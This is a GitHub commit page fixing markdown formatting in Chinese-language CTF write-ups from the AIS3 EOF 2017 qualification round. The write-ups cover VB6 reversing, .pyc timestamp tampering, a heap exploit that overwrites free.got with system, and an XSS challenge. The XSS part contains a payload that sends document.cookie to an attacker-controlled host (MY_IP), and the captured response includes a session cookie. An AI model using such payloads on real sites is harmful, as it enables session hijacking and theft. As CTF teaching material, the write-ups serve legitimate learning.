Skip to content

Commit d50cce8

Browse files
committed
Fix md syntax errors.
1 parent 97ce354 commit d50cce8

File tree

4 files changed

+4
-4
lines changed

4 files changed

+4
-4
lines changed

ais3-eof-2017/qualification/MOSburger.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,4 +3,4 @@ Credits to my teammates.
33

44
### solution
55
題目是VB6的bianry,直接反編譯無法獲得有用資訊。
6-
試著用x64dbg調查,從字串著手發現有"WRONG"訊息,在該處下斷點,發現stack上有"money$"字串,試著輸入該字串,說給我些有用訊息就沒了,再調查string,發現有個字串"mosburger.txt",但不知道在哪,再次下斷點,發現在appdata的資料夾中,裡面有mos code,上網decode變成binary code,再解碼get flag
6+
試著用x64dbg調查,從字串著手發現有`"WRONG"`訊息,在該處下斷點,發現stack上有`"money$"`字串,試著輸入該字串,說給我些有用訊息就沒了,再調查string,發現有個字串`"mosburger.txt"`,但不知道在哪,再次下斷點,發現在appdata的資料夾中,裡面有mos code,上網decode變成binary code,再解碼get flag

ais3-eof-2017/qualification/Python2Easy.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ Credits to my teammates.
44
### solution
55
server在檢查讀寫檔案是只會禁止對`secret.py`讀寫,所以可以對`secret.pyc`讀寫達成目的
66
`.pyc`檔案中第5~8個byte為timestamp,若與`.py`的timestamp不同則會在reload時重新生成`.pyc`
7-
所以可以先讀取``secret.pyc`的前10個byte得到timestamp,再執行以下`.py`檔
7+
所以可以先讀取`secret.pyc`的前10個byte得到timestamp,再執行以下`.py`
88
並將得到的`.pyc` timestamp改為與server上的`secret.pyc`相同,並重新寫到`secret.pyc`
99
此時因為`secret.pyc``server.py`的timestamp相同,reload時會直接load我們寫好的`.pyc`
1010
key即變為`'123'`,可以通過`check`獲得flag

ais3-eof-2017/qualification/magicheap.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ Credits to my teammates.
1515
`free.got`改成`system`即可get shell
1616

1717
### script
18-
``` pyhton
18+
```pyhton
1919
from pwn import *
2020
2121
#r = process("./magicheap",env={"LD_PRELOAD":"./ais3.so.6"})

ais3-eof-2017/qualification/xssme.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@
77
<img src="#"onerror=javascript:document.location="http://MY_IP/log.php?c="+document.cookie>
88
```
99
得到以下回應:
10-
```
10+
```php
1111
Array
1212
(
1313
[c] => PHPSESSID=1oiprdg6u65httgspivmnpjfe6; FLAG_XSSME=FLAG{Sometimes, XSS can be critical vulnerability <script>alert(1)</script>}; FLAG_2=IN_THE_REDIS

0 commit comments

Comments
 (0)